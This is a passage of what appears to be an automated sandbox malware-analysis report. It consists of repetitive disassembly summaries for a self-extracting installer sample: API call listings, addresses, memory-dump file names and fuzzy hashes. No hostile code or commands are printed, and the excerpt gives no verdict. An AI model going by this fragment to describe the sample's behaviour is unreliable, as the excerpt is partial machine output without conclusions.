                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$WarningTitle
                                                                                • API String ID: 3472027048-1960609661
                                                                                • Opcode ID: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
                                                                                • Instruction ID: 6ded7748b71ab9f5b936a386d8eac6af1666c8eea906bb290fcf471db964143e
                                                                                • Opcode Fuzzy Hash: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
                                                                                • Instruction Fuzzy Hash: 6151B134E0174587EB24ABA689117AE73A1AF50318F14807FE8023B3D1EB7D59A5D64F
                                                                                APIs
                                                                                  • Part of subcall function 004161F4: ??3@YAXPAX@Z.MSVCRT(?,?,00416647,?), ref: 004161F9
                                                                                  • Part of subcall function 004161F4: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00416647,?), ref: 00416214
                                                                                  • Part of subcall function 00416221: ??3@YAXPAX@Z.MSVCRT(?,?,00416EAA,00000000,00000001,?,?,0000000B,00000000), ref: 00416226
                                                                                  • Part of subcall function 00416221: ??2@YAPAXI@Z.MSVCRT(?,?,?,00416EAA,00000000,00000001,?,?,0000000B,00000000), ref: 00416232
                                                                                  • Part of subcall function 0040C020: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C034
                                                                                  • Part of subcall function 0040C020: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C04E
                                                                                  • Part of subcall function 0040C020: memcpy.MSVCRT(?,?,00000000,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C068
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,00000000,00000001,?,?,0000000B,00000000), ref: 00416F2C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,00000000,00000001,?,?,0000000B,00000000), ref: 00416F34
                                                                                  • Part of subcall function 004161C7: ??3@YAXPAX@Z.MSVCRT(?,00000000,00416D8C,00000001,00000009,00000000), ref: 004161CC
                                                                                  • Part of subcall function 004161C7: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,00416D8C,00000001,00000009,00000000), ref: 004161E7
                                                                                  • Part of subcall function 004167C5: memset.MSVCRT ref: 004167DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@$memcpymemset
                                                                                • String ID: $!$@
                                                                                • API String ID: 1807930983-2517134481
                                                                                • Opcode ID: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
                                                                                • Instruction ID: f55dd101b204f21da1f631f5c3487a3bc2704fd2e33f175c23863e5c7b78e8a3
                                                                                • Opcode Fuzzy Hash: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
                                                                                • Instruction Fuzzy Hash: C0E13D70904249DFCF14DF95C580AEDBBB2BF49314F25849EE806AB352D739A9C2CB58
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 004013EF
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 00401427
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 00401431
                                                                                • GetTickCount.KERNEL32 ref: 00401452
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040147E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00401491
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@$CountTick
                                                                                • String ID:
                                                                                • API String ID: 590505967-0
                                                                                • Opcode ID: dbc5a267aae96199abb321f813b19ad4c45933dca4bf6f3a90f53bd09cd1a26d
                                                                                • Instruction ID: a6903403f5f4fcf2204198b93a2ae2fd4058f2025a7845204c1723fd466c5d3b
                                                                                • Opcode Fuzzy Hash: dbc5a267aae96199abb321f813b19ad4c45933dca4bf6f3a90f53bd09cd1a26d
                                                                                • Instruction Fuzzy Hash: F531D331A00111AFCF25AFA5C8899AEB7A5AF05314F14407FF942B72B1DB388D81D798
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(00406644,?,00406644,?,0041E844,;!@InstallEnd@!,0041E844,;!@Install@!UTF-8!,0041E484,00000000,00000001,?,00000000,0041E7B8), ref: 004060F8
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000,0041E7B8), ref: 00406094
                                                                                • ??3@YAXPAX@Z.MSVCRT(00406644,?,00406644,?,0041E844,;!@InstallEnd@!,0041E844,;!@Install@!UTF-8!,0041E484,00000000,00000001,?,00000000,0041E7B8), ref: 00406110
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy
                                                                                • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                • API String ID: 750647942-372238525
                                                                                • Opcode ID: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
                                                                                • Instruction ID: 6115e21da8c550f7c259bf06f757151a7c4d16b5fd4a7f66b5d549820aeda24a
                                                                                • Opcode Fuzzy Hash: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
                                                                                • Instruction Fuzzy Hash: 69315271D00219ABCF05EF95DD929EEBB75BF54314F20002BF512B22E2DB381A95CB29
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
                                                                                  • Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C
                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
                                                                                • wsprintfW.USER32 ref: 00404400
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: PathTemp$??2@??3@AttributesFilewcsncpywsprintf
                                                                                • String ID: PreExtract
                                                                                • API String ID: 342973707-1883995278
                                                                                • Opcode ID: 4754dd3ff6774aabc1f35bd0900d899d6f3fa381659397aea7e9fa8c202ad21f
                                                                                • Instruction ID: 87ce6a64adcde4581c58fbcd89a197d799c86788f89504f70527ff8ba021350e
                                                                                • Opcode Fuzzy Hash: 4754dd3ff6774aabc1f35bd0900d899d6f3fa381659397aea7e9fa8c202ad21f
                                                                                • Instruction Fuzzy Hash: EE0100B07012086BC214AF6ADC4492EF399EFC0758B01457EF206A76E2CF79991587A9
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 004075D3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 00407600
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000048,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040760F
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040765D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040766F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@
                                                                                • String ID:
                                                                                • API String ID: 4113381792-0
                                                                                • Opcode ID: 75212ddedd759167315a9b93dd9dba7832f0b089d27dc0147d4a255857f60f82
                                                                                • Instruction ID: a987b35fad98e116647973f19acdcfb235c3ad9f5bac28a4ad03e7c43b89f24f
                                                                                • Opcode Fuzzy Hash: 75212ddedd759167315a9b93dd9dba7832f0b089d27dc0147d4a255857f60f82
                                                                                • Instruction Fuzzy Hash: B2315531E04A116BDB266BA9C8159AFB7A58F01724B14047FFD037B3D1DB39AC42C68E
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(0041E080,?,00920E56,0041E7B8,?,?,?,?,?,?,004019E3), ref: 00401635
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016E1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016E9
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016F8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 00401700
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$lstrlen
                                                                                • String ID:
                                                                                • API String ID: 2031685711-0
                                                                                • Opcode ID: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
                                                                                • Instruction ID: 3b55230dadd2a4d047f6e8a8713cbcc3279512281016c63c74d99a53e3c26446
                                                                                • Opcode Fuzzy Hash: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
                                                                                • Instruction Fuzzy Hash: 8D21C232D042159BDB20AB65CC457EAB7B5AF11304F08487BE842B32E1E77A5C85CA4D
                                                                                APIs
                                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31
                                                                                  • Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
                                                                                  • Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF
                                                                                • memset.MSVCRT ref: 004092CA
                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
                                                                                • SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
                                                                                • GetDlgItem.USER32(?,000004B7), ref: 00409311
                                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00008190), ref: 0040931F
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
                                                                                  • Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
                                                                                  • Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086BB
                                                                                  • Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086CE
                                                                                  • Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086E3
                                                                                  • Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
                                                                                • String ID:
                                                                                • API String ID: 358862773-0
                                                                                • Opcode ID: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
                                                                                • Instruction ID: 03ccca4f95bb87f70630d4e99c8394251a1916bed47e60b30c1cc3b52240f206
                                                                                • Opcode Fuzzy Hash: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
                                                                                • Instruction Fuzzy Hash: 5A1186B1E0031467DB10EBA5DD4DF9E77BCAB44B04F00446EB611F32C1DBB8AA448B69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 004086BB
                                                                                • SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 004086CE
                                                                                  • Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 004086E3
                                                                                • SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Item$FocusMessageSendTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3590784419-0
                                                                                • Opcode ID: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
                                                                                • Instruction ID: e481abceb184fc0549e30438c3999ed73e1b8a385c7d6d0c75719509d1fab071
                                                                                • Opcode Fuzzy Hash: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
                                                                                • Instruction Fuzzy Hash: 3EF0EC7110120C7FDB103752DC48D6B7F9DEBC53543014439FA0583120CB766C108B74
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00414380,?,00000000), ref: 00413AC3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00414380,?,00000000), ref: 00413ACB
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00414380,?,00000000), ref: 00413AD3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,00414380,?,00000000), ref: 00413ADB
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,00414380,?,00000000), ref: 00413AE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
                                                                                • Instruction ID: 781d56d26fbb2de701dc3dac839f3b2d883cb9d7cd57b29d0df98cb94b4adf54
                                                                                • Opcode Fuzzy Hash: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
                                                                                • Instruction Fuzzy Hash: 29D0C731400511BAEA223B16EC1B9C67AB3AF0031830D056FF8871143BDB567CE1DA4C
                                                                                APIs
                                                                                  • Part of subcall function 00408579: GetSystemMetrics.USER32(0000000B), ref: 004085A1
                                                                                  • Part of subcall function 00408579: GetSystemMetrics.USER32(0000000C), ref: 004085A8
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00408864
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00408875
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040893C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
